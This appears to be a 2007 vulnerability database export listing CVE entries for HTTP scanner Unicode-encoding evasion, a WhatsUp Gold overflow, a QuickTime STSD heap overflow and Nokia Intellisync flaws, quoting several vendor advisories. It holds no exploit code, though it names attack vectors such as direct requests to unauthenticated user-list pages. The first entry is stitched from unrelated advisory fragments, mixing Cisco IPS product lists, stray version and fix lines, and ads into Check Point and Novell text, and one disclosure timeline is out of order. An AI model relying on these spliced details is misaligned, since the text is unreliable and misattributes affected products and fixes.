| VAR-200705-0413 | CVE-2007-2689 | HTTP content scanning systems full-width/half-width Unicode encoding bypass | CVSS V2: 7.8 CVSS V3: - Severity: HIGH | 
                            Check Point Web Intelligence does not properly handle certain full-width and half-width Unicode character encodings, which might allow remote attackers to evade detection of HTTP traffic. Various HTTP content scanning systems fail to properly scan full-width/half-width Unicode encoded traffic. This may allow malicious HTTP traffic to bypass content scanning systems. Web Intelligence is prone to a remote security vulnerability. 
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date. 
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors. 
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Novell iChain HTTP Unicode Encoding Detection Bypass
SECUNIA ADVISORY ID:
SA26692
VERIFY ADVISORY:
http://secunia.com/advisories/26692/
CRITICAL:
Less critical
IMPACT:
Security Bypass
WHERE:
>From remote
SOFTWARE:
Novell iChain 2.x
http://secunia.com/product/1423/
DESCRIPTION:
A vulnerability has been reported in Novell iChain, which can be
exploited by malicious people to bypass certain security
restrictions. 
SOLUTION:
Apply iChain 2.3 SP5 Interim Release 3 or greater (2.3.408). 
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor. 
ORIGINAL ADVISORY:
https://secure-support.novell.com/KanisaPlatform/Publishing/539/3193302_f.SAL_Public.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Full-width and half-width is an encoding technique for Unicode
characters. 
Some Open Source or Microsoft Products such as Microsoft ISS and .NET
Framework properly decode this type of encoding. 
Risk Level : High
Impact : Security Bypass
Systems Affected :
Checkpoint Web Intelligence (Confirmed)
IBM ISS Proventia Series (Confirmed)
Full List of Vendors : (CERT - Vulnerability Note VU#739224) [1]
Remedy :
Contact your vendor for a hotfix, patch or advanced configuration. 
Credits :
Fatih Ozavci (GamaTEAM Member)
Caglar Cakici (GamaTEAM Member)
It's detected using GamaSEC Exploit Framework
GamaSEC Information Security Audit and Consulting Services
(www.gamasec.net)
Original Advisory Link :
http://www.gamasec.net/english/gs07-01.html
References :
   1. CERT - Vulnerability Note VU#739224
      http://www.kb.cert.org/vuls/id/739224
   2. Unicode Home Page
      http://unicode.org
   3. Unicode.org, Halfwidth and Fullwidth Forms
      http://www.unicode.org/charts/PDF/UFF00.pdf
-- 
Best Regards
Fatih Ozavci
IT Security Consultant
. 
----------------------------------------------------------------------
2003: 2,700 advisories published
2004: 3,100 advisories published
2005: 4,600 advisories published
2006: 5,300 advisories published
How do you know which Secunia advisories are important to you?
The Secunia Vulnerability Intelligence Solutions allows you to filter
and structure all the information you need, so you can address issues
effectively. 
The vulnerability is reported in versions prior to 4.0. 
SOLUTION:
Update to version 4.0 or later. 
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure. 
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications. 
The vulnerability affects the following products:
* Cisco Intrusion Prevention System (IPS)
* Cisco IOS with Firewall/IPS Feature Set
SOLUTION:
No fix or workaround is currently available
                        
| VAR-200705-0299 | CVE-2007-2602 | Ipswitch WhatsUp Gold of MIBEXTRA.EXE Vulnerable to buffer overflow | CVSS V2: 7.8 CVSS V3: - Severity: HIGH | 
                            Buffer overflow in MIBEXTRA.EXE in Ipswitch WhatsUp Gold 11 allows attackers to cause a denial of service (application crash) or execute arbitrary code via a long MIB filename argument.  NOTE: If there is not a common scenario under which MIBEXTRA.EXE is called with attacker-controlled command line arguments, then perhaps this issue should not be included in CVE. WhatsUp Gold is prone to a denial-of-service vulnerability
                        
| VAR-200705-0153 | CVE-2007-0754 | Apple QuickTime Heap-based buffer overflow vulnerability | CVSS V2: 9.3 CVSS V3: - Severity: HIGH | 
                            Heap-based buffer overflow in Apple QuickTime before 7.1.3 allows user-assisted remote attackers to execute arbitrary code via a crafted Sample Table Sample Descriptor (STSD) atom size in a QuickTime movie. Apple QuickTime is prone to a heap-based buffer-overflow issue because it fails to properly check boundaries on user-supplied data before  copying it into an insuficiently sized memory buffer. 
An attacker may exploit this issue by enticing  victims into opening a maliciously crafted 'MOV' QuickTime movie file. 
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the user running the application. Failed exploit attempts likely result in denial-of-service conditions. 
Versions of QuickTime 7 prior to 7.1.3 are vulnerable. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. There is a heap overflow vulnerability in QuickTime when parsing malformed STSD elements. If an attacker specifies a malicious element size, a heap overflow may be triggered when parsing a MOV file, resulting in arbitrary instruction execution. TPTI-07-07: Apple QuickTime STSD Parsing Heap Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-07-07
May 10, 2007
-- CVE ID:
CVE-2007-0754
-- Affected Vendor:
Apple
-- Affected Products:
QuickTime Player 7.x
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since January 31, 2006 by Digital Vaccine protection
filter ID 4109. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file. 
The specific flaw exists within the parsing of malformed Sample Table
Sample Descriptor (STSD) atoms. Specifying a malicious atom size can
result in an under allocated heap chunk and subsequently an exploitable
heap corruption. 
-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details
can be found at:
    http://docs.info.apple.com/article.html?artnum=304357
-- Disclosure Timeline:
2006.06.16 - Vulnerability reported to vendor
2006.01.31 - Digital Vaccine released to TippingPoint customers
2007.05.10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by Ganesh Devarajan,
TippingPoint DVLabs
                        
| VAR-200705-0287 | CVE-2007-2590 | Nokia Intellisync Mobile Suite Vulnerabilities that collect important information | CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM | 
                            Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allows remote attackers to obtain user names and other sensitive information via a direct request to (1) usrmgr/userList.asp or (2) usrmgr/userStatusList.asp. Intellisync Mobile Suite is prone to a information disclosure vulnerability. 
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure. 
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications. 
----------------------------------------------------------------------
TITLE:
Nokia Intellisync Mobile Suite Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA25212
VERIFY ADVISORY:
http://secunia.com/advisories/25212/
CRITICAL:
Moderately critical
IMPACT:
Cross Site Scripting, Exposure of system information, Exposure of
sensitive information, DoS
WHERE:
>From remote
SOFTWARE:
Intellisync Mobile Suite
http://secunia.com/product/3450/
DESCRIPTION:
Johannes Greil has reported some vulnerabilities in Nokia's
Intellisync Mobile Suite, which can be exploited by malicious people
to gain knowledge of sensitive information, conduct cross-site
scripting attacks, manipulate certain data, or cause a DoS (Denial of
Service). 
1) Missing authentication checks within certain ASP scripts (e.g. 
userList.asp, userStatusList.asp) can be exploited to modify or gain
knowledge of certain user details, or to disable user accounts. 
2) Certain input passed to de/pda/dev_logon.asp,
usrmgr/registerAccount.asp, and de/create_account.asp is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site. 
3) An error within the bundled Apache Tomcat server can be exploited
to disclose directory listings and script source codes. 
The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and
6.6.2.2 and is reported to partially affect Nokia Intellisync Wireless
Email Express. Other versions may also be affected. 
SOLUTION:
Upgrade to GMS 2. 
PROVIDED AND/OR DISCOVERED BY:
Johannes Greil, SEC Consult
ORIGINAL ADVISORY:
http://www.sec-consult.com/289.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
                        
